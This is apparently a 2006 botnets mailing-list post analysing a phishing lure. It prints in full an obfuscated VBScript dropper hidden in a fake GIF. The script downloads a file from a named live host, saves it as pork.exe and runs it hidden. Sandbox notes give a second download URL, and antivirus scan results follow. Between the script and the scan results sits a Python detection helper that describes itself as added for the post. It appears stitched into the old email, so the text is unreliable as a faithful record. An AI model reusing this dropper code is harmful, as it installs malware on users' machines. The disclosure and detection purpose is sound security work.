To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
This one was new to me. A gif that wasn't.  Came via email. Link was 
to http://lulavergonha.rg3.net which framed a gif 
(http://mywebpage.netscape.com/lu7y7u/lula.gif) that firefox would 
not deal with. Does explorer really open these?

Anyway, content of gif had javascript to download the malware 
(beware below is an active link as of this email):

<script language="VBScript">

     on error resume next



     ' due to how ajax works, the file MUST be within the same local domain
     dl = "http://mywebpage.netscape.com/lu7y7u/lula.cmd";

     ' create adodbstream object
     Set df = document.createElement("object")
     df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
     str="Microsoft.XMLHTTP"
     Set x = df.CreateObject(str,"")

     a1="Ado"
     a2="db."
     a3="Str"
     a4="eam"
     str1=a1&a2&a3&a4
     str5=str1
     set S = df.createobject(str5,"")
     S.type = 1

     ' xml ajax req
     str6="GET"
     x.Open str6, dl, False
     x.Send

     ' Get temp directory and create our destination name
     fname1="pork.exe"
     set F = df.createobject("Scripting.FileSystemObject","")
     set tmp = F.GetSpecialFolder(2) ' Get tmp folder
     fname1= F.BuildPath(tmp,fname1)
     S.open
     ' open adodb stream and write contents of request to file
     ' like vbs dl exec code
     S.write x.responseBody
     ' Saves it with CreateOverwrite flag
     S.savetofile fname1,2

     S.close
     set Q = df.createobject("Shell.Application","")
     Q.ShellExecute fname1,"","","open",0



     </script>
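The script above is a classic ADODB.Stream / XMLHTTP "download and execute" dropper served under a .gif name, with the ProgID split into fragments ("Ado"&"db."&"Str"&"eam") to dodge naive string matching. The following triage helper is an added example written for this post, not code from the original email or from any product named in it. It assumes two constructed inputs: a tiny valid GIF and a non-functional HTML fragment that reuses only the indicator strings from the script above (the URL is replaced with a placeholder). It checks the file's magic bytes against the claimed extension, resolves simple VBScript string concatenations so the real ProgIDs surface, and counts the COM/ActiveX indicators present.

```python
import re

# Constructed inputs for the demo (not the live sample from the email).
SAMPLE_REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
                   b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01"
                   b"\x00\x00\x02\x02D\x01\x00;")
SAMPLE_NOT_A_GIF = b'''<html><body>
<script language="VBScript">
     on error resume next
     dl = "http://example.invalid/payload.cmd";
     Set df = document.createElement("object")
     df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
     str="Microsoft.XMLHTTP"
     a1="Ado"
     a2="db."
     a3="Str"
     a4="eam"
     str1=a1&a2&a3&a4
     str5=str1
     set S = df.createobject(str5,"")
     S.savetofile fname1,2
     Q.ShellExecute fname1,"","","open",0
</script></body></html>'''

GIF_MAGICS = (b"GIF87a", b"GIF89a")

# ProgIDs and method names that together indicate a download-and-execute dropper.
SUSPICIOUS_TOKENS = [
    "adodb.stream", "microsoft.xmlhttp", "scripting.filesystemobject",
    "shell.application", "savetofile", "shellexecute", "responsebody",
]
# The classid used in the posted script (matched as a string only).
SUSPICIOUS_CLSIDS = ["bd96c556-65a3-11d0-983a-00c04fc29e36"]


def is_real_gif(data: bytes) -> bool:
    """True only if the bytes start with a GIF87a/GIF89a header."""
    return data[:6] in GIF_MAGICS


def resolve_string_concats(script: str) -> dict:
    """Resolve VBScript assignments of string literals and '&'-joins of
    earlier variables, so split ProgIDs appear as a single string."""
    values = {}
    assign = re.compile(r'^\s*(?:set\s+)?(\w+)\s*=\s*(.+?)\s*;?\s*$', re.I)
    for line in script.splitlines():
        m = assign.match(line)
        if not m:
            continue
        name, expr = m.group(1), m.group(2)
        parts, ok = [], True
        for piece in re.split(r'\s*&\s*', expr):
            piece = piece.strip()
            if len(piece) >= 2 and piece[0] == '"' and piece[-1] == '"':
                parts.append(piece[1:-1])          # string literal
            elif piece in values:
                parts.append(values[piece])        # previously resolved variable
            else:
                ok = False                         # call or expression: skip
                break
        if ok and parts:
            values[name] = "".join(parts)
    return values


def analyze(data: bytes, claimed_ext: str = "gif") -> dict:
    """Return indicator findings for a blob that claims to be an image."""
    findings = []
    if claimed_ext.lower() == "gif" and not is_real_gif(data):
        findings.append("extension/magic mismatch: not a GIF")
    text = data.decode("latin-1")
    low = text.lower()
    if re.search(r'<script[^>]*vbscript', low):
        findings.append("VBScript block")
    resolved = resolve_string_concats(text)
    # Search both the raw text and the de-obfuscated variable values.
    haystack = low + "\n" + "\n".join(v.lower() for v in resolved.values())
    for tok in SUSPICIOUS_TOKENS:
        if tok in haystack:
            findings.append("token:" + tok)
    for clsid in SUSPICIOUS_CLSIDS:
        if clsid in low:
            findings.append("clsid:" + clsid)
    return {"findings": findings, "resolved": resolved, "score": len(findings)}


if __name__ == "__main__":
    for label, blob in (("real gif", SAMPLE_REAL_GIF), ("fake gif", SAMPLE_NOT_A_GIF)):
        r = analyze(blob)
        print(label, "score", r["score"], r["findings"])
```

The magic-byte check alone separates the two samples; the token scan then explains why the second one matters, and the resolved variable table shows "Adodb.Stream" reassembled from its four fragments. In a mail gateway or proxy this is the kind of check to run on anything whose declared type and actual bytes disagree.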

[ scan result ]
AntiVir 7.3.0.21/20061229       found [TR/Delphi.Downloader.Gen]
Authentium      4.93.8/20061229 found nothing
Avast   4.7.892.0/20061221      found nothing
AVG     386/20061229    found nothing
BitDefender     7.2/20061229    found [Trojan.Downloader.Banload.MG]
CAT-QuickHeal   8.00/20061229   found nothing
ClamAV  devel-20060426/20061229 found nothing
DrWeb   4.33/20061229   found nothing
eSafe   7.0.14.0/20061228       found nothing
eTrust-InoculateIT      23.73.101/20061229      found nothing
eTrust-Vet      30.3.3289/20061229      found nothing
Ewido   4.0/20061229    found [Downloader.Delf.acn]
F-Prot  3.16f/20061229  found nothing
F-Prot4 4.2.1.29/20061229       found nothing
Fortinet        2.82.0.0/20061229       found nothing
Ikarus  T3.1.0.27/20061229      found [Trojan-Downloader.Win32.Dadobra.CV]
Kaspersky       4.0.2.24/20061229       found nothing
McAfee  4928/20061228   found nothing
Microsoft       1.1904/20061227 found nothing
NOD32v2 1946/20061229   found [probably a variant of Win32/TrojanDownloader.Banload.BAY]
Norman  5.80.02/20061229        found [W32/Downloader]
Panda   9.0.0.4/20061228        found [Suspicious file]
Prevx1  V2/20061229     found nothing
Sophos  4.13.0/20061228 found nothing
Sunbelt 2.2.907.0/20061218      found nothing
TheHacker       6.0.3.139/20061229      found nothing
UNA     1.83/20061228   found nothing
VBA32   3.11.1/20061229 found nothing
VirusBuster     4.3.19:9/20061229       found nothing

[ notes ]
norman sandbox: [ General information ]
     * **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: 
[EMAIL PROTECTED] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH 
PASSWORD)**.
     * File length:        43520 bytes.

  [ Changes to filesystem ]
     * Creates file C:\WINDOWS\SYSTEM32\imgrt.scr.

  [ Network services ]
     * Downloads file from 
http://www.aquipodeserbom.xpg.com.br/firma01.bmp as 
C:\WINDOWS\SYSTEM32\imgrt.scr.

  [ Security issues ]
     * Starting downloaded file - potential security problem.



-- 

Tom Shaw - Chief Engineer, OITC
<[EMAIL PROTECTED]>, http://www.oitc.com/
US Phone Numbers: 321-984-3714, 321-729-6258(fax), 
321-258-2475(cell/voice mail,pager)
Text Paging: http://www.oitc.com/Pager/sendmessage.html
AIM/iChat: [EMAIL PROTECTED]
Google Talk: [EMAIL PROTECTED]
skype: trshaw
_______________________________________________
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
